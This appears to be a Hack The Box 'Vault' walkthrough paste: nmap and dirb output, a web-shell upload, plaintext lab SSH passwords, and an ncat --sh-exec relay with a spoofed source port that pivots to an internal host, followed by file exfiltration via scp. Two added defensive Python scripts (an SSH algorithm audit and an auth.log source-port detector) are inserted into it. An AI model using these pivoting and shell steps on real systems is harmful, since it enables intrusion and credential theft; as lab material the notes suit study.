Untitled

a guest, Nov 6th, 2018
root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:52 MDT
Nmap scan report for 10.10.10.109
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=11/3%OT=22%CT=1%CU=42739%PV=Y%DS=2%DC=T%G=Y%TM=5BDE0AC
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=100%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%
OS:TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5
OS:=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   193.74 ms 10.10.14.1
2   105.66 ms 10.10.10.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.83 seconds


root@kali:~/HTB/boxes/Vault# nmap -sU 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 15:12 MDT
Nmap scan report for 10.10.10.109
Host is up (0.14s latency).
Not shown: 997 closed ports
PORT     STATE         SERVICE
389/udp  open|filtered ldap
631/udp  open|filtered ipp
5353/udp open|filtered zeroconf

Nmap done: 1 IP address (1 host up) scanned in 1083.23 seconds


root@kali:~/HTB/boxes/Vault# nmap --script=/usr/share/nmap/scripts/ssh2-enum-algos.nse 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:57 MDT
Nmap scan report for 10.10.10.109
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh2-enum-algos:
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds

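An added check, not part of the original paste: the script below parses the ssh2-enum-algos block above (embedded as a constructed string so it runs offline) and flags the algorithms that current OpenSSH hardening guidance treats as legacy: SHA-1 based key exchange and MACs, the SHA-1 `ssh-rsa` host-key signature scheme, and 64-bit UMAC tags. It then emits the sshd_config directives (KexAlgorithms, HostKeyAlgorithms, Ciphers, MACs, all real OpenSSH options) that would restrict the server to the remaining algorithms. The weakness policy in `is_weak` and the function names are this example's own assumptions, not anything the scanned host or nmap provides.

```python
import re

# Constructed sample: the ssh2-enum-algos block from the scan above, embedded
# verbatim so the script runs offline.
SAMPLE = """\
| ssh2-enum-algos:
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
"""

# A category header looks like "kex_algorithms: (6)".
CATEGORY_RE = re.compile(r"^(\w+): \((\d+)\)$")


def parse_enum_algos(text):
    """Return {category: [algorithm, ...]} from ssh2-enum-algos output.

    Raises ValueError when a category lists a different number of entries
    than its header declares, a sign of truncated or mangled output.
    """
    algos, declared, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()  # drop the NSE "| " / "|_ " gutter
        if not line:
            continue
        m = CATEGORY_RE.match(line)
        if m:
            current = m.group(1)
            algos[current] = []
            declared[current] = int(m.group(2))
        elif current is not None:  # skips the "ssh2-enum-algos:" title line
            algos[current].append(line)
    for cat, n in declared.items():
        if len(algos[cat]) != n:
            raise ValueError(f"{cat}: header says {n}, parsed {len(algos[cat])}")
    return algos


def is_weak(category, algo):
    """Policy (assumption): SHA-1 anywhere, the SHA-1 'ssh-rsa' signature scheme, 64-bit UMAC tags."""
    if "sha1" in algo:
        return True
    if category == "server_host_key_algorithms" and algo == "ssh-rsa":
        return True
    if category == "mac_algorithms" and algo.startswith("umac-64"):
        return True
    return False


def audit(text):
    """Map each category to the algorithms the policy flags."""
    return {cat: [a for a in algs if is_weak(cat, a)]
            for cat, algs in parse_enum_algos(text).items()}


# ssh2-enum-algos category -> sshd_config directive that restricts it.
# (Compression is a yes/no option in sshd_config, so it has no list here.)
SSHD_DIRECTIVE = {
    "kex_algorithms": "KexAlgorithms",
    "server_host_key_algorithms": "HostKeyAlgorithms",
    "encryption_algorithms": "Ciphers",
    "mac_algorithms": "MACs",
}


def hardened_sshd_config(text):
    """sshd_config lines keeping only the algorithms the policy did not flag."""
    parsed = parse_enum_algos(text)
    return [f"{directive} {','.join(a for a in parsed.get(cat, []) if not is_weak(cat, a))}"
            for cat, directive in SSHD_DIRECTIVE.items()]


if __name__ == "__main__":
    for cat, weak in audit(SAMPLE).items():
        print(f"{cat}: {', '.join(weak) if weak else 'ok'}")
    print("\n".join(hardened_sshd_config(SAMPLE)))
```

Against the sample it flags diffie-hellman-group14-sha1, ssh-rsa and the four SHA-1/umac-64 MACs and leaves the ciphers alone. The count check matters in practice: NSE output copied out of a terminal is often truncated, and silently auditing half a list would report a server as cleaner than it is.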
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov  3 15:05:13 2018
URL_BASE: http://10.10.10.109/sparklays/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.109/sparklays/ ----
+ http://10.10.10.109/sparklays/admin.php (CODE:200|SIZE:615)
==> DIRECTORY: http://10.10.10.109/sparklays/design/

---- Entering directory: http://10.10.10.109/sparklays/design/ ----
==> DIRECTORY: http://10.10.10.109/sparklays/design/uploads/

---- Entering directory: http://10.10.10.109/sparklays/design/uploads/ ----

-----------------
END_TIME: Sat Nov  3 15:36:08 2018
DOWNLOADED: 13836 - FOUND: 1

LOGIN PAGE
http://10.10.10.109/sparklays/admin.php

UPLOAD FILES
http://10.10.10.109/sparklays/design/changelogo.php

UPLOADED POWNY@SHELL TO GAIN WEB BROWSER SHELL AND FOUND SSH PASSWORD IN DAVE DESKTOP FOLDER
ssh dave@10.10.10.109
Dav3therav3123

FOUND FILE ENTITLED KEY THAT CONTAINS
itscominghome

ACCESS WEBSITE FROM SERVER
ssh -D 8080 dave@10.10.10.109

MORE CREDENTIALS FOUND
root@DNS: var www DNS desktop# cat ssh
dave
dav3gerous567

SSH INTO DNS SERVER
ssh dave@192.168.122.4
dav3gerous567

BECOME ROOT
sudo su -
dav3gerous567

TRACEROUTE (using port 1723/tcp)
HOP RTT     ADDRESS
1   0.82 ms 192.168.5.1

Nmap scan report for Vault (192.168.5.2)
Host is up (0.0021s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
53/tcp   closed domain
4444/tcp closed krb524
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 53/tcp)
HOP RTT     ADDRESS
1   0.98 ms 192.168.122.5
2   1.86 ms Vault (192.168.5.2)

HOW TO
SEE WHAT PORTS ARE OPEN ON VAULT
cat /var/log/auth.log | grep -a 192.168.5.2
You will see it uses port 4444 for ssh.

SET UP A LISTENER
ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &

Check the port is open on Vault
/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

SSH IN
ssh dave@localhost -p 5555

ps aux | grep ncat
Check whether port 5555 is already being used by someone else.

dave@vault:~$ ls
root.txt.gpg

SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
[1] 14627

COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
dave@localhost's password:
root.txt.gpg                                                 100%  629     0.6KB/s   00:00
[1]+  Done                    ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
root@DNS:~# cd /tmp
root@DNS:/tmp# ls
root.txt.gpg  test.txt

Connection to 192.168.122.4 closed.
COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
dave@192.168.122.4's password:
root.txt.gpg                                                 100%  629     0.6KB/s   00:00
dave@ubuntu:~$ cd /dev/shm

DECRYPT THE GPG ROOT FILE
dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
      "david <dave@david.com>"

ROOT FILE
ca468370b91d1f5906e31093d9bfe819
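The pivot in the HOW TO section only reaches port 987 on Vault when the relay sends from source port 4444, the port the auth.log grep shows Vault using for ssh, which suggests the filter in front of Vault is keyed on the client's source port. As an added defender-side check that is not part of the original notes, the script below parses sshd `Accepted`/`Failed` lines from a constructed auth.log sample and flags client connections whose source port sits below the Linux ephemeral range or that reuse one source port across several connections; a normal SSH client picks a fresh ephemeral port per connection, so either pattern points at a fixed source port rather than an ordinary client. The log lines, the host name `DNS`, the 32768 floor and the function names are this example's own assumptions.

```python
import re
from collections import Counter

# Constructed auth.log sample (not real output from the machines above).
SAMPLE_AUTH_LOG = """\
Nov  3 15:40:01 DNS sshd[1201]: Accepted password for dave from 192.168.122.1 port 51522 ssh2
Nov  3 15:41:17 DNS sshd[1233]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Nov  3 15:41:17 DNS sshd[1233]: pam_unix(sshd:session): session opened for user dave by (uid=0)
Nov  3 15:42:02 DNS sshd[1240]: Failed password for invalid user admin from 192.168.5.2 port 4444 ssh2
Nov  3 15:43:30 DNS sshd[1250]: Accepted publickey for dave from 192.168.122.1 port 51530 ssh2
"""

# Matches the standard sshd authentication result line; "invalid user" is
# optional because sshd inserts it for unknown account names.
SSHD_AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+) ssh2"
)

# Default floor of net.ipv4.ip_local_port_range on Linux (assumed for the client).
LINUX_EPHEMERAL_MIN = 32768


def parse_sshd_line(line):
    """Return a dict (result, method, user, ip, port) or None for other lines."""
    m = SSHD_AUTH_RE.search(line)
    if not m:
        return None
    event = m.groupdict()
    event["port"] = int(event["port"])
    return event


def find_fixed_source_ports(lines, ephemeral_min=LINUX_EPHEMERAL_MIN):
    """Flag (ip, port) pairs that look like a deliberately fixed client source port.

    Two signals: the port is below the ephemeral range, or the same
    ip:port pair shows up on more than one authentication attempt.
    """
    events = [e for e in map(parse_sshd_line, lines) if e]
    per_endpoint = Counter((e["ip"], e["port"]) for e in events)
    findings = []
    for (ip, port), count in sorted(per_endpoint.items()):
        reasons = []
        if port < ephemeral_min:
            reasons.append("source port below ephemeral range")
        if count > 1:
            reasons.append(f"same source port reused across {count} connections")
        if reasons:
            findings.append({"ip": ip, "port": port, "connections": count, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_fixed_source_ports(SAMPLE_AUTH_LOG.splitlines()):
        print(f"{f['ip']}:{f['port']} ({f['connections']} connections): {'; '.join(f['reasons'])}")
```

On a real host, feed it `open("/var/log/auth.log").read().splitlines()`. Treat hits as leads rather than verdicts: the ephemeral floor differs by client OS, and a NAT device in the path can legitimately reuse ports. The durable fix is on the firewall side, where a rule that admits traffic on the strength of the client's source port grants nothing that the client cannot choose for itself.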